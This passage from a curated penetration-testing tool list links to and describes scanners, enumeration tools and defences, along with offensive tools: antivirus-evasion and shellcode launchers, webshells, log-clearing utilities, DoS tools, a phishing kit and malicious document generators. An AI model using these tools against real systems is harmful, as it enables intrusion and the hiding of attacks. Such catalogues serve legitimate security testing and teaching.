a believable attack quickly. 111 | * [ShellPhish](https://github.com/suljot/shellphish): Phishing Tool for Instagram, Facebook, Twitter, Snapchat, Github.napchat, Github. 112 | 113 | #### Monitoring webpages for updates and changes 114 | * [visualping](https://visualping.io/): Monitor website changes… so you don't have to! 115 | * [Website-Watcher](https://www.aignes.com/): Monitor websites for new content and changes. 116 | 117 | #### Monitoring website traffic of target company 118 | * [Alexa](https://www.alexa.com/): Find, Reach, and Convert Your Audience. 119 | * [TeamViewer Web Monitoring](https://www.teamviewer.com/es/remote-management/monitorizacion-de-web/): Monitor the web experience (old Monitis). 120 | * [Web-Stat](https://www.web-stat.com/) 121 | 122 | #### Phone number 123 | * [phoneinfoga](https://github.com/sundowndev/PhoneInfoga): Advanced information gathering & OSINT framework for phone numbers. 124 | 125 | #### Traceroute 126 | * [IT Management Software & Remote Monitoring Tools | SolarWinds](https://www.solarwinds.com/) 127 | * [Path Analyzer Pro](https://www.pathanalyzer.com/): Path Analyzer Pro delivers advanced network route-tracing with performance tests, DNS, whois, and network resolution to investigate network issues. By integrating all these powerful features into one simple graphical interface, Path Analyzer Pro has become a must-have tool for any network, systems, or security professional on Windows and Mac OS X. 128 | * [VisualRoute](http://www.visualroute.com/) 129 | 130 | #### Twitter 131 | * [#onemilliontweetmap](https://onemilliontweetmap.com/) 132 | * [Creepy](https://www.geocreepy.com/): Creepy is a geolocation OSINT tool. Gathers geolocation related information from online sources, and allows for presentation on map, search filtering based on exact location and/or date, export in csv format or kml for further analysis in Google Maps. 133 | * [First Tweet - Who Said It First on Twitter](http://ctrlq.org/first/) 134 | * [foller.me](https://foller.me/): Twitter analytics application that gives you rich insights about any public Twitter profile. We gather near real-time data about topics, mentions, hashtags, followers, location and more! 135 | * [Followerwonk](https://followerwonk.com/): Help to explore and grow one's social graph by digging deeper into Twitter analytics. 136 | * [Omnisci](https://www.omnisci.com/demos/tweetmap) 137 | * [tinfoleak](https://github.com/vaguileradiaz/tinfoleak): The most complete open-source tool for Twitter intelligence analysis. 138 | 139 | #### Website footprinting 140 | * [Burp Suite](https://portswigger.net/burp) 141 | * [Find Subdomains Online | Pentest-Tools.com](https://pentest-tools.com/information-gathering/find-subdomains-of-domain) 142 | * [Wappalyzer](https://github.com/AliasIO/wappalyzer): Identifies technologies on websites, including content management systems, ecommerce platforms, JavaScript frameworks, analytics tools and much more. 143 | * [Website informer](https://chrome.google.com/webstore/detail/website-informer-addon/hgmkhdckpblkakgojblgmlgaeaimofom): Evaluates authority and popularity of websites you are visiting. 144 | * [What's that site running? | Netcraft](https://sitereport.netcraft.com/): Find out the infrastructure and technologies used by any site using results from our internet data mining. 145 | * [Zaproxy](https://github.com/zaproxy/zaproxy): The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by a dedicated international team of volunteers. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. 146 | 147 | ##### Website footprinting using spiders 148 | * [ParseHub](https://www.parsehub.com/): It is a free and powerful web scraping tool. With our advanced web scraper, extracting data is as easy as clicking on the data you need. 149 | * [SpiderFoot](https://www.spiderfoot.net/): Automates OSINT collection and helps you find what matters 150 | * [Web Data Extractor](http://www.webextractor.com/): It is a web scraping tool specifically designed for mass-gathering of various data types. It can harvest URLs, phone and fax numbers, email addresses, as well as meta tag information and body text. Special feature of WDE Pro is custom extraction of structured data. 151 | * [webscarab-ng](https://code.google.com/archive/p/webscarab-ng/): WebScarab-NG is a complete rewrite of the old WebScarab application, with a special focus on making the application more user-friendly. 152 | 153 | ### Networks 154 | * [Angry IP Scanner](https://github.com/angryip/ipscan): Fast and friendly network scanner 155 | * [Capsa Portable Network Analyzer](https://www.colasoft.com/capsa/): Monitor, Analyze, Troubleshoot your Wired & Wireless Network. 156 | * [Colasoft Packet Builder](https://www.colasoft.com/packet_builder/): Colasoft Packet Builder enables creating custom network packets; users can use this tool to check their network protection against attacks and intruders. Colasoft Packet Builder includes a very powerful editing feature. Besides common HEX editing raw data, it features a Decoding Editor allowing users to edit specific protocol field values much easier. 157 | * [hping](https://github.com/antirez/hping): hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. hping3 can handle fragmentation, and almost arbitrary packet size and content, using the command line interface. 158 | * [HTTPort 3.SNFM](https://www.targeted.org/htthost/): HTTPort allows you to bypass your HTTP proxy, which is blocking you from the Internet. With HTTPort you may use various Internet software from behind the proxy, ex. e-mail, instant messengers, P2P file sharing, ICQ, News, FTP, IRC, etc. 159 | * [Jaqen](https://github.com/LinkedInAttic/jaqen): Simple DNS rebinding. 160 | * [Megaping](http://www.magnetosoft.com/product/megaping/features): MegaPing is the ultimate must-have toolkit that provides essential utilities for Information System specialists, system administrators, IT solution providers or individuals. 161 | * [Metasploit Framework](https://github.com/rapid7/metasploit-framework) 162 | * [Nav](https://github.com/Uninett/nav): Network Administration Visualized. 163 | * [netCut](https://www.arcai.com/netCut/s/): With netCut, you can know who has is or has been on your WIFI, his name, device brand, what time in, what time out. 164 | * [NetScanTools](https://www.netscantools.com/nstpromain.html): NetScanTools Pro is an integrated collection of internet information gathering and network troubleshooting utilities for Network Professionals. Research IPv4 addresses, IPv6 addresses, hostnames, domain names, email addresses and URLs automatically** or with manual tools. It is designed for the Windows operating system GUI. **Automated tools are started interactively by the user. Include a promiscous detection scanner. 165 | * [NetSurveyor](http://nutsaboutnets.com/archives/netsurveyor-wifi-scanner/): It is an 802.11 (WiFi) network discovery tool that gathers information about nearby wireless access points in real time and displays it in useful ways. Similar in purpose to NetStumbler, it includes many more features. 166 | * [Network Topology Mapper](https://www.solarwinds.com/es/network-topology-mapper): Network mapping software designed to automatically map your network. 167 | * [Nmap](https://github.com/nmap/nmap): The Network Mapper. 168 | * [Omnipeek Network Protocol Analyzer](https://www.liveaction.com/products/omnipeek-network-protocol-analyzer/) 169 | * [Ostinato](https://github.com/pstavirs/ostinato): Packet/Traffic Generator and Analyzer. 170 | * [sparta](https://github.com/SECFORCE/sparta): Network Infrastructure Penetration Testing Tool: NMap + hydra. 171 | * [SteelCentral Packet Analyzer](https://support.riverbed.com/content/support/software/steelcentral-npm/packet-analyzer.html) 172 | * [Unicornscan](https://github.com/dneufeld/unicornscan) 173 | * [wireshark](https://github.com/wireshark/wireshark): Wireshark is a network traffic analyzer, or "sniffer", for Linux, macOS, *BSD and other Unix and Unix-like operating systems and for Windows. It uses Qt, a graphical user interface library, and libpcap and npcap as packet capture and filtering libraries. 174 | 175 | #### Android 176 | * [Fing](https://play.google.com/store/apps/details?id=com.overlook.android.fing) 177 | * [netCut](https://arcai.com/netcut-for-android/): With netCut, you can know who has is or has been on your WIFI, his name, device brand, what time in, what time out. 178 | * [Network IP Scanner](https://play.google.com/store/apps/details?id=com.goodidea.network.ipscanner) 179 | * [Network Scanner](https://play.google.com/store/apps/details?id=com.easymobile.lan.scanner) 180 | * [Network Spoofer](https://sourceforge.net/projects/netspoof/): Lets you change websites on other people’s computers from an Android phone. After downloading simply log onto a Wifi network, choose a spoof to use and press start. 181 | * [WHO'S ON MY WIFI - NETWORK SCANNER](https://play.google.com/store/apps/details?id=com.magdalm.wifinetworkscanner) 182 | 183 | #### ARP 184 | 185 | ##### ARP Poisoning 186 | * [Cain](https://github.com/xchwarze/Cain) 187 | * [Ettercap](https://www.ettercap-project.org/): It is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis. 188 | 189 | ##### Protection 190 | * [ARP AntiSpoofer](https://sourceforge.net/projects/arpantispoofer/): A utility for detecting and resisting BIDIRECTIONAL ARP spoofing. It can anti-spoof for not only the local host, but also other hosts in the same subnet. It is as well a handy helper for gateways which don't work well with ARP. 191 | * [ArpON](https://sourceforge.net/projects/arpon/): It is a Host-based solution that make the ARP standardized protocol secure in order to avoid the Man In The Middle (MITM) attack through the ARP spoofing, ARP cache poisoning or ARP poison routing attack. 192 | * [arpstraw](https://github.com/he2ss/arpstraw): Arp spoof detection tool. 193 | * [shARP](https://github.com/europa502/shARP): An anti-ARP-spoofing application software that use active and passive scanning methods to detect and remove any ARP-spoofer from the network. 194 | * [XArp – Advanced ARP Spoofing Detection](http://www.xarp.net/): It is a security application that uses advanced techniques to detect ARP based attacks. 195 | 196 | #### DHCP 197 | 198 | ##### DHCP starvation attack 199 | * [DHCPig](https://github.com/kamorin/DHCPig): DHCP exhaustion script written in python using scapy network library. 200 | * [dhcpstarv](http://dhcpstarv.sourceforge.net/): Is tool that implements DHCP starvation attack. It requests DHCP leases on specified interface, save them and renew on regular basis. 201 | * [Gobbler](http://gobbler.sourceforge.net/) 202 | * [Hyenae](https://sourceforge.net/projects/hyenae/): It is a highly flexible platform independent network packet generator. It allows you to reproduce several MITM, DoS and DDoS attack scenarios, comes with a clusterable remote daemon and an interactive attack assistant. 203 | * [yersinia](https://github.com/tomac/yersinia): A framework for layer 2 attacks. 204 | 205 | ##### Rogue DHCP attack 206 | * [Cain](https://github.com/xchwarze/Cain) 207 | 208 | #### DoS 209 | * [hping3](https://github.com/antirez/hping): hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. hping3 can handle fragmentation, and almost arbitrary packet size and content, using the command line interface. 210 | * [High Orbit Ion Cannon (HOIC)](https://sourceforge.net/projects/highorbitioncannon/) 211 | * [Low Orbit Ion Cannon (LOIC)](https://github.com/NewEraCracker/LOIC): An open source network stress tool, written in C#. Based on Praetox's LOIC project. 212 | 213 | ##### Protection 214 | * [Anti DDoS Software](http://www.anti-ddos.net/): Monitors each incoming and outgoing packet in Real-Time. It displays the local address, remote address, and other information of each network flow. Anti DDoS Guardian limits network flow number, client bandwidth, client concurrent TCP connection number, and TCP connection rate. It also limits the UDP bandwidth, UDP connection rate, and UDP packet rate. 215 | * [DDoS-GUARD](https://ddos-guard.net/) 216 | * [DOSarrest’s DDoS protection service](https://www.dosarrest.com/) 217 | * [Cloudflare](https://www.cloudflare.com/) 218 | * [ID Ransomware](https://id-ransomware.malwarehunterteam.com/): Upload a ransom note and/or sample encrypted file to identify the ransomware that has encrypted your data. 219 | * [Imperva Incapsula DDoS Protection](https://www.imperva.com/products/ddos-protection-services/) 220 | 221 | #### MAC address 222 | 223 | ##### MAC flood attack 224 | * [macof](https://linux.die.net/man/8/macof): Flood a switched LAN with random MAC addresses. 225 | * [yersinia](https://github.com/tomac/yersinia): A framework for layer 2 attacks. 226 | 227 | ##### MAC Spoofing 228 | * [SMAC](https://www.klcconsulting.net/smac/): FREE MAC Address Spoofing Tool. 229 | * [Technitium MAC Address Changer (TMAC)](https://technitium.com/tmac/): A freeware utility to spoof MAC address instantly. 230 | 231 | 232 | 233 | --- 234 | 235 | 236 | 237 | ### Enumeration 238 | * [Active Directory Explorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer): It is an advanced Active Directory (AD) viewer and editor. You can use AD Explorer to easily navigate an AD database, define favorite locations, view object properties and attributes without having to open dialog boxes, edit permissions, view an object's schema, and execute sophisticated searches that you can save and re-execute. 239 | * [Advanced IP Scanner](https://www.advanced-ip-scanner.com/): Reliable and free network scanner to analyse LAN. The program shows all network devices, gives you access to shared folders, provides remote control of computers (via RDP and Radmin), and can even remotely switch computers off. It is easy to use and runs as a portable edition. It should be the first choice for every network admin. 240 | * [Amass](https://github.com/OWASP/Amass): The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques. 241 | * [dig](https://github.com/polarityio/dig): Network admin tool for querying DNS servers. 242 | * [dirsearch](https://github.com/maurosoria/dirsearch): Web path scanner. 243 | * [dnsrecon](https://github.com/darkoperator/dnsrecon): DNS Enumeration Script. 244 | * [dnswalk](https://github.com/davebarr/dnswalk): A DNS database debugger. 245 | * [domained](https://github.com/TypeError/domained): Multi Tool Subdomain Enumeration. 246 | * [Engineer's Toolset](https://www.solarwinds.com/engineers-toolset): Network software with over 60 must-have tools. 247 | * [enum4linux](https://github.com/CiscoCXSecurity/enum4linux): It is a Linux alternative to enum.exe for enumerating data from Windows and Samba hosts. 248 | * [EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness): EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. 249 | * [Global Network Inventory](http://www.magnetosoft.com/product/global_network_inventory/features): Global Network Inventory is a powerful and flexible software and hardware inventory system that can be used as an audit scanner in an agent-free and zero deployment environments. If used as an audit scanner, it only requires full administrator rights to the remote computers you wish to scan. Global Network Inventory can audit remote computers and even network appliances, including switches, network printers, document centers, etc. 250 | * [gobuster](https://github.com/OJ/gobuster): Directory/File, DNS and VHost busting tool written in Go. 251 | * [google-url-extractor.js](https://github.com/DragonJAR/Scripts/blob/master/google-url-extractor.js): Small script that extracts all URLs from a Google search result. 252 | * [httprobe](https://github.com/tomnomnom/httprobe): Take a list of domains and probe for working HTTP and HTTPS servers. 253 | * [Hurricane Electric BGP Toolkit](https://bgp.he.net/) 254 | * [jxplorer](http://jxplorer.org/downloads/): It is a cross platform LDAP browser and editor. It is a standards compliant general purpose LDAP client that can be used to search, read and edit any standard LDAP directory, or any directory service with an LDAP or DSML interface. 255 | * [Knock](https://github.com/guelfoweb/knock): Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist. It is designed to scan for DNS zone transfer and to try to bypass the wildcard DNS record automatically if it is enabled. Now knockpy supports queries to VirusTotal subdomains, you can setting the API_KEY within the config.json file. 256 | * [LDAP Account Manager](https://www.ldap-account-manager.org/lamcms/releases) 257 | * [LDAP Admin](http://www.ldapadmin.org/download/ldapadmin.html) 258 | * [LDAP Administrator](https://www.ldapadministrator.com/download.htm) 259 | * [massdns](https://github.com/blechschmidt/massdns): A high-performance DNS stub resolver for bulk lookups and reconnaissance (subdomain enumeration). 260 | * [NetBIOS Enumerator](http://nbtenum.sourceforge.net/): This application was suggested to show how to use remote network support and how to deal with some other interesting web technics like SMB. 261 | * [NetScanTools](https://www.netscantools.com/nstpromain.html): NetScanTools Pro is an integrated collection of internet information gathering and network troubleshooting utilities for Network Professionals. Research IPv4 addresses, IPv6 addresses, hostnames, domain names, email addresses and URLs automatically** or with manual tools. It is designed for the Windows operating system GUI. **Automated tools are started interactively by the user. 262 | * [Network Browser](https://www.solarwinds.com/es/network-performance-monitor/use-cases/ip-network-browser): NPM uses the SNMP protocol to send requests across your network and receive responses containing key configuration data, including system details and device failures. This is especially beneficial when dealing with large and dynamic networks using equipment from multiple vendors. Just provide a list of IP addresses or subnets along with SNMP credentials, and the NPM Network Sonar Wizard will automatically scan for devices. 263 | * [Network Performance Monitor](https://www.solarwinds.com/es/network-performance-monitor): Multi-vendor network monitoring that scales and expands with the needs of your network. 264 | * [nmap-vulners](https://github.com/vulnersCom/nmap-vulners/blob/master/http-vulners-regex.nse): Identifies the used software for each found http port and builds CPEs for the identified versions. 265 | * [nsauditor](http://www.nsauditor.com/) 266 | * [nsec3map](https://github.com/anonion0/nsec3map): A tool to enumerate the resource records of a DNS zone using its DNSSEC NSEC or NSEC3 chain 267 | * [NSEarch (Nmap Script Engine Search)](https://github.com/jtibaquira/nsearch): Minimal script to help find script into the nse database. 268 | * [PsTools](https://docs.microsoft.com/en-us/sysinternals/downloads/pstools) 269 | * [RPCScan](https://github.com/hegusung/RPCScan): Tool to communicate with RPC services and check misconfigurations on NFS shares 270 | * [snmpcheck](https://github.com/pwnieexpress/pwn_plug_sources/blob/master/src/snmpcheck/snmpcheck-1.8.pl): Like to snmpwalk, snmpcheck permits to enumerate information via SNMP protocol. 271 | * [SoftPerfect Network Scanner](https://www.softperfect.com/products/networkscanner/): Can ping computers, scan ports, discover shared folders and retrieve practically any information about network devices via WMI, SNMP, HTTP, SSH and PowerShell. It also scans for remote services, registry, files and performance counters; offers flexible filtering and display options and exports NetScan results to a variety of formats from XML to JSON. 272 | * [subbrute](https://github.com/TheRook/subbrute): A DNS meta-query spider that enumerates DNS records, and subdomains. 273 | * [subfinder](https://github.com/projectdiscovery/subfinder): Subfinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing. 274 | * [Sublist3r](https://github.com/aboul3la/Sublist3r): Fast subdomains enumeration tool for penetration testers. 275 | * [SuperEnum](https://github.com/p4pentest/SuperEnum): This script does the basic enumeration of any open port along with screenshots. 276 | * [SystemTools Hyena](https://www.systemtools.com/hyena/): Using the built-in Windows administration tools to manage a medium to large Windows network or Active Directory environment can be a challenge. Add multiple domains, hundreds or thousands of servers, workstations, and users, and before you know it, things can get out of hand. Hyena is designed to both simplify and centralize nearly all of the day-to-day management tasks, while providing new capabilities for system administration. This functionality is provided in a single, centralized, easy to use product. Used today by tens of thousands of system administrators worldwide, Hyena is the one tool that every administrator cannot afford to be without. 277 | * [waybackurls](https://github.com/tomnomnom/waybackurls): Fetch all the URLs that the Wayback Machine knows about for a domain. 278 | * [wfuzz](https://github.com/xmendez/wfuzz): Web application fuzzer. 279 | 280 | 281 | 282 | --- 283 | 284 | 285 | 286 | ### Vulnerability Analysis 287 | 288 | #### Vulnerability Scanning 289 | * [GFI LanGuard](https://www.gfihispana.com/products-and-solutions/network-security-solutions/gfi-languard) 290 | * [Nessus](https://www.tenable.com/products/nessus): Scanning for vulnerabilities in various operating systems. It consists of a daemon, nessusd, which performs the scan on the target system, and nessus, the client which displays the progress and reports on the status of the scans. 291 | * [nikto](https://github.com/sullo/nikto): Nikto web server scanner. 292 | * [OpenVAS](https://www.openvas.org/): It is a full-featured vulnerability scanner. Its capabilities include unauthenticated testing, authenticated testing, various high level and low level Internet and industrial protocols, performance tuning for large-scale scans and a powerful internal programming language to implement any type of vulnerability test. 293 | * [skipfish](https://code.google.com/archive/p/skipfish/): Is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments. 294 | * [Vulnerability Scanning Tools by OWASP](https://owasp.org/www-community/Vulnerability_Scanning_Tools) 295 | 296 | #### Databases 297 | * [CVE mitre](https://cve.mitre.org/): The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. 298 | * [CWE mitre](https://cwe.mitre.org/): It is a community-developed list of software and hardware weakness types. It serves as a common language, a measuring stick for security tools, and as a baseline for weakness identification, mitigation, and prevention efforts. 299 | * [National Vulnerability Database](https://nvd.nist.gov/): The NVD is the U.S. government repository of standards based vulnerability management data represented using the Security Content Automation Protocol (SCAP). This data enables automation of vulnerability management, security measurement, and compliance. The NVD includes databases of security checklist references, security-related software flaws, misconfigurations, product names, and impact metrics. 300 | * [Objective-See](https://objective-see.com/malware.html) 301 | * [SecurityFocus](https://www.securityfocus.com/) 302 | * [Talos - Vulnerability Information](https://talosintelligence.com/vulnerability_info): Talos investigates software and operating system vulnerabilities in order to discover them before malicious threat actors do. We provide this information to vendors so that they can create patches and protect their customers as soon as possible. 303 | 304 | 305 | 306 | --- 307 | 308 | 309 | 310 | ### System hacking 311 | * [https://github.com/9emin1/charlotte](https://github.com/9emin1/charlotte): c++ fully undetected shellcode launcher ;). 312 | * [DSInternals](https://github.com/MichaelGrafnetter/DSInternals): The DSInternals project consists of these two parts: 1 - The DSInternals Framework exposes several internal features of Active Directory and can be used from any .NET application. The codebase has already been integrated into several 3rd party commercial products that use it in scenarios like Active Directory disaster recovery, identity management, cross-forest migrations and password strength auditing. 2 - The DSInternals PowerShell Module provides easy-to-use cmdlets that are built on top of the Framework. 313 | * [EagleShell](https://github.com/TRSTN4/EagleShell): EagleShell is a high-quality tool that aims to improve your pentest. 314 | * [Metasploit Framework](https://github.com/rapid7/metasploit-framework) 315 | * [mimikatz](https://github.com/gentilkiwi/mimikatz): A little tool to play with Windows security. 316 | * [MSFvenom Payload Creator (MSFPC)](https://github.com/g0tmi1k/msfpc): A quick way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework). 317 | * [ntdsxtract](https://github.com/csababarta/ntdsxtract): Active Directory forensic framework. 318 | * [PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite): Here you will find privilege escalation tools for Windows and Linux/Unix and MacOS. These tools search for possible local privilege escalation paths that you could exploit and print them to you with nice colors so you can recognize the misconfigurations easily. 319 | * [php-webshells](https://github.com/JohnTroony/php-webshells): Common PHP webshells you might need for your Penetration Testing assignments or CTF challenges. Do not host the file(s) on your server! 320 | * [PowerTools](https://github.com/PowerShellEmpire/PowerTools): PowerTools is a collection of PowerShell projects with a focus on offensive operations. 321 | * [unicorn](https://github.com/trustedsec/unicorn): It is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18. 322 | * [Veil](https://github.com/Veil-Framework/Veil): It is a tool designed to generate metasploit payloads that bypass common anti-virus solutions. 323 | * [venom](https://github.com/r00t-3xp10it/venom): The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( C# | python | ruby | dll | msi | hta-psh | docm | apk | macho | elf | deb | mp4 | etc ) injects the shellcode generated into one template (example: python) "the python funtion will execute the shellcode into ram" and uses compilers like gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file. 324 | * [wevtutil](https://docs.microsoft.com/es-es/windows-server/administration/windows-commands/wevtutil): Enables you to retrieve information about event logs and publishers. You can also use this command to install and uninstall event manifests, to run queries, and to export, archive, and clear logs. 325 | * [WhiteWinterWolf's PHP web shell](https://github.com/WhiteWinterWolf/wwwolf-php-webshell) 326 | 327 | #### Android 328 | * [PhoneSploit](https://github.com/aerosol-can/PhoneSploit): A tool for remote ADB exploitation in Python3 for all Machines. 329 | * [Quick Android Review Kit (QARK)](https://github.com/linkedin/qark): Tool to look for several security related Android application vulnerabilities. 330 | * [Quixxi Vulnerability Scanner](https://vulnerabilitytest.quixxi.com/#/) 331 | * [Shellshock Vulnerability Scan](https://play.google.com/store/apps/details?id=in.indiandragon.shellshock.shellshockvulnerabilityscan&hl=es&gl=US): Free, fastest & open Source app to scan for Shellshock vulnerability in Android. 332 | * [Vulners Scanner](https://play.google.com/store/apps/details?id=com.vulners&hl=en_US&gl=US): It implements technology of passive vulnerability scanning based on software version fingerprint. 333 | * [Yaazhini](https://www.vegabird.com/yaazhini/): Free Android APK & API Vulnerability Scanner. 334 | * [zANTI](https://www.zimperium.com/zanti-mobile-penetration-testing): It is a mobile penetration testing toolkit that lets security managers assess the risk level of a network with the push of a button. This easy to use mobile toolkit enables IT Security Administrators to simulate an advanced attacker to identify the malicious techniques they use in the wild to compromise the corporate network. 335 | 336 | #### iOS 337 | * [Trident](https://github.com/benjamin-42/Trident): This exploits the following two CVEs: CVE-2016-4655, allow an attacker to obtain sensitive information from kernel memory via a crafted app; and CVE-2016-4656, allow an attacker to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app. 338 | 339 | #### Privilege Escalation / Post exploitation 340 | * [BeRoot](https://github.com/AlessandroZ/BeRoot): It is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege. 341 | * [linpostexp](https://github.com/reider-roque/linpostexp): ux post exploitation enumeration and exploit checking tools. 342 | * [meterpreter - getsystem](https://docs.rapid7.com/metasploit/meterpreter-getsystem/) 343 | * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/): A PowerShell Post-Exploitation Framework 344 | 345 | #### Exploit databases 346 | * [Circl](https://cve.circl.lu/) 347 | * [CVE mitre](https://cve.mitre.org/): The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. 348 | * [cxsecurity](https://cxsecurity.com/exploit) 349 | * [Exploit Database](https://www.exploit-db.com/) 350 | * [SecurityFocus](https://www.securityfocus.com/) 351 | * [VulDB](https://vuldb.com/) 352 | * [Vulners](https://vulners.com/) 353 | 354 | #### Logs 355 | * [auditpol](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol): Displays information about and performs functions to manipulate audit policies. 356 | * [BleachBit](https://www.bleachbit.org) 357 | * [Clear_Event_Viewer_Logs.bat](https://www.tenforums.com/tutorials/16588-clear-all-event-logs-event-viewer-windows.html) 358 | * [DBAN](https://dban.org) 359 | * [Log-killer](https://github.com/Rizer0/Log-killer): Clear all your logs in [linux/windows] servers. 360 | * [Privacy Eraser](https://www.cybertronsoft.com) 361 | * [Wipe](https://privacyroot.com) 362 | 363 | #### Password cracking / Login brute-forcer 364 | * [Brutus Password Cracker](https://www.darknet.org.uk/2006/09/brutus-password-cracker-download-brutus-aet2zip-aet2/) 365 | * [Cain](https://github.com/xchwarze/Cain): Password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncover,… 366 | * [hashcat](https://github.com/hashcat/hashcat): Password recovery utility, supporting five unique modes of attack for over 300 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and macOS, and has facilities to help enable distributed password cracking. 367 | * [John the Ripper jumbo](https://github.com/openwall/john): Advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs. 368 | * [L0phtCrack Password Auditor](https://www.l0phtcrack.com/): Enforce strong passwords across your enterprise. 369 | * [medusa](https://github.com/jmk-foofus/medusa): Medusa is a speedy, parallel, and modular, login brute-forcer. 370 | * [penglab](https://github.com/mxrch/penglab): Abuse of Google Colab for cracking hashes. 371 | * [RainbowCrack](https://project-rainbowcrack.com/): It is a general propose implementation of Philippe Oechslin's faster time-memory trade-off technique. It crack hashes with rainbow tables. 372 | * [Responder](https://github.com/lgandx/Responder): Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. 373 | * [thc-hydra](https://github.com/vanhauser-thc/thc-hydra): Number one of the biggest security holes are passwords, as every password security study shows. This tool is a proof of concept code, to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system. 374 | 375 | 376 | 377 | --- 378 | 379 | 380 | 381 | ### Malwares 382 | * [4n4lDetector](http://www.enelpc.com/p/4n4ldetector.html): It is a tool for analysis of Windows executable files, in order to quickly identify if this is or is not a malware. Most analyzes are based on the extraction of strings "ANSI" and "UNICODE" in disk, but also works with "Memory Dumps". 383 | * [Advanced AV Evasion Tool For Red Team Ops](https://github.com/1y0n/AV_Evasion_Tool) 384 | * [Antispy](https://hakin9.org/antispy-a-free-but-powerful-anti-virus-and-rootkits-toolkit/): AntiSpy is a free but powerful anti virus and rootkits toolkit.It offers you the ability with the highest privileges that can detect, analyze and restore various kernel modifications and hooks.With its assistance, you can easily spot and neutralize malware, hidden from normal detectors. 385 | * [awesome-malware-analysis](https://github.com/rshipp/awesome-malware-analysis): A curated list of awesome malware analysis tools and resources. 386 | * [awesome-yara](https://github.com/InQuest/awesome-yara): A curated list of awesome YARA rules, tools, and people. 387 | * [Bytehist](https://cert.at/en/downloads/software/software-bytehist): A tool for generating byte-usage-histograms for all types of files with a special focus on binary executables in PE-format (Windows). 388 | * [Cerbero Suite](https://cerbero.io/) 389 | * [Disk pulse](https://www.diskpulse.com/): It is a real-time disk change monitoring solution allowing one to monitor one or more disks or directories, save reports and disk change monitoring statistics, export detected changes to a centralized SQL database, execute custom commands and send E-Mail notifications when unauthorized changes are detected in critical system files. 390 | * [EvilClippy](https://github.com/outflanknl/EvilClippy): A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX and Windows. 391 | * [Ghidra-Scripts](https://github.com/AGDCservices/Ghidra-Scripts): Malware analysis scripts for Ghidra. 392 | * [hijackthis](https://github.com/dragokas/hijackthis/): A free utility that finds malware, adware and other security threats. 393 | * [Indetectables Toolkit](https://github.com/indetectables-net/toolkit): Fundamental reverse/analysis/cracking toolkit. 394 | * [MalAPI.io](https://malapi.io/): List of Windows API functions ranked based on their usefulness in malware. 395 | * [Malicious PDF Generator](https://github.com/jonaslejon/malicious-pdf): Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator. 396 | * [MalwareAnalysis.co](https://malwareanalysis.co/): Collection of malware tool and resources: [Windows](https://malwareanalysis.co/resources/tools/windows/), [macOS](https://malwareanalysis.co/resources/tools/macos/), [Linux](https://malwareanalysis.co/resources/tools/linux/), [https://malwareanalysis.co/resources/tools/android/](Android). 397 | * [M/Monit](https://mmonit.com/): Can monitor and manage distributed computer systems, conduct automatic maintenance and repair and execute meaningful causal actions in error situations. 398 | * [obfuscation_detection](https://github.com/mrphrazer/obfuscation_detection): Collection of scripts to pinpoint obfuscated code. 399 | * [PELock Software Protection & Software License Key System](https://github.com/PELock/PELock-Software-Protection-and-Licensing-SDK) 400 | * [Phantom-Evasion](https://github.com/oddcod3/Phantom-Evasion): It is an antivirus evasion tool written in python (both compatible with python and python3) capable to generate (almost) fully undetectable executable even with the most common x86 msfvenom payload. 401 | * [Process Explorer](https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer): Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded. 402 | * [Process Monitor](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon): It is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity. 403 | * [ProcDOT](https://www.procdot.com/): There are plenty of tools for behavioral malware analysis. The defacto standard ones, though, are Sysinternals’s Process Monitor 